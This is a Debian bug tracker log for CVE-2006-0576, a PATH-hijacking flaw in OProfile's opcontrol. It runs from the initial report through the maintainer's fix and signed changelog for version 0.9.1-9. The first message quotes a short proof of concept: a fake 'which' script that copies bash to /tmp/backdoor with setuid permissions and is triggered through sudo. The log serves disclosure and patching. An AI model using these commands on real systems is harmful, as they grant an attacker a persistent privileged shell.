Debian Bug report logs - #352910
CVE-2006-0576: Untrusted search path vulnerability in opcontrol in OProfile 0.9.1

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Micah Anderson <micah@debian.org>

To: Debian Bug Tracking System <submit@bugs.debian.org>

Subject: CVE-2006-0576: Untrusted search path vulnerability in opcontrol in OProfile 0.9.1

Date: Wed, 15 Feb 2006 00:04:13 -0500

Package: oprofile
Severity: normal

CVE-2006-0576 reads:

Untrusted search path vulnerability in opcontrol in OProfile 0.9.1 and
earlier allows local users to execute arbitrary commands via a modified 
PATH that references malicious (1) which or (2) dirname programs. 
NOTE: while opcontrol normally is not run setuid, a common configuration 
suggests accessing opcontrol using sudo. In such a context, this is a
vulnerability.                                                                                                            

Giving sudo to oprofile is apparantly a very common practice.

>From the original report:

Whoever coded the script tried protecting it against executing binaries
out of a safe PATH by defining one on line 1416:  
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin                                                   

The problem is that this script does not check where the 'which' or 
'dirname' binary is executed from on line 1413/1414.                                                                          

This enables a malicious user to execute arbitrary code by using the
following pseudo'exploit':                                                                                                    
                            cat > which                                                                                                         
                            #!/bin/sh                                                                                                           
                            /bin/cp /bin/bash /tmp/backdoor                                                                                     
                            /bin/chmod 6755 /tmp/backdoor                                                                                       
                            ^C                                                                                                                  
                            set PATH="."                                                                                                        
                            /usr/bin/sudo /usr/local/bin/opcontrol

This is a relatively low severity vulnerability, but easily fixed.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.15-1-686-smp
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Message #10 received at 352910@bugs.debian.org (full text, mbox, reply):

From: Al Stone <ahs3@fc.hp.com>

To: Micah Anderson <micah@debian.org>, 352910@bugs.debian.org

Subject: Re: Bug#352910: CVE-2006-0576: Untrusted search path vulnerability in opcontrol in OProfile 0.9.1

Date: Wed, 15 Feb 2006 08:59:45 -0700

On Wed, 2006-02-15 at 00:04 -0500, Micah Anderson wrote:
> Package: oprofile
> Severity: normal
> 
> CVE-2006-0576 reads:
> 
> Untrusted search path vulnerability in opcontrol in OProfile 0.9.1 and
> earlier allows local users to execute arbitrary commands via a modified 
> PATH that references malicious (1) which or (2) dirname programs. 
> NOTE: while opcontrol normally is not run setuid, a common configuration 
> suggests accessing opcontrol using sudo. In such a context, this is a
> vulnerability.                                                                                                            

Thanks for the report; a patch has been suggested upstream and
appears to be acceptable.  I'll get that incorporated and uploaded
quickly.

-- 
Ciao,
al
----------------------------------------------------------------------
Al Stone                                      Alter Ego:
Open Source and Linux R&D                     Debian Developer
Hewlett-Packard Company                       http://www.debian.org
E-mail: ahs3@fc.hp.com                        ahs3@debian.org
----------------------------------------------------------------------

Message #15 received at 352910-close@bugs.debian.org (full text, mbox, reply):

From: Al Stone <ahs3@debian.org>

To: 352910-close@bugs.debian.org

Subject: Bug#352910: fixed in oprofile 0.9.1-9

Date: Fri, 17 Feb 2006 10:47:13 -0800

Source: oprofile
Source-Version: 0.9.1-9

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-common_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile-common_0.9.1-9_i386.deb
oprofile-gui_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile-gui_0.9.1-9_i386.deb
oprofile-source_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile-source_0.9.1-9_i386.deb
oprofile_0.9.1-9.diff.gz
  to pool/main/o/oprofile/oprofile_0.9.1-9.diff.gz
oprofile_0.9.1-9.dsc
  to pool/main/o/oprofile/oprofile_0.9.1-9.dsc
oprofile_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile_0.9.1-9_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 352910@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Al Stone <ahs3@debian.org> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Fri, 17 Feb 2006 11:22:41 -0700
Source: oprofile
Binary: oprofile-common oprofile oprofile-gui oprofile-source
Architecture: source i386
Version: 0.9.1-9
Distribution: unstable
Urgency: low
Maintainer: Al Stone <ahs3@debian.org>
Changed-By: Al Stone <ahs3@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-common - system-wide profiler for Linux systems (command line components)
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
 oprofile-source - Source for the OProfile driver
Closes: 352910
Changes: 
 oprofile (0.9.1-9) unstable; urgency=low
 .
   * Closes: bug#352910 -- CVE-2006-0576: Untrusted search path vulnerability
     in opcontrol (re-used patch from CVS HEAD)
Files: 
 7bddc1ebdb61867f4ad6601d39a6da77 787 devel optional oprofile_0.9.1-9.dsc
 822e869f229113ac639ee17f0eaf48a7 106206 devel optional oprofile_0.9.1-9.diff.gz
 b244e34676db8dcc704344a58648ba7b 182916 devel optional oprofile_0.9.1-9_i386.deb
 84322859101c6f34371a0694658d6e6c 3894534 devel optional oprofile-common_0.9.1-9_i386.deb
 fd0ef7adb004cd23a0c32cf15dc2f607 88680 devel optional oprofile-gui_0.9.1-9_i386.deb
 f302e67e3d8b6dd0036171614637a201 342942 devel optional oprofile-source_0.9.1-9_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFD9hbSso6+T7qY4V0RApc5AJ40xUJ2LCcaoFoOXRwN9PjLpvDDoQCeKy+0
j+hpb2VmmyDdqveihUr0qhk=
=bwj5
-----END PGP SIGNATURE-----

Send a report that this bug log contains spam.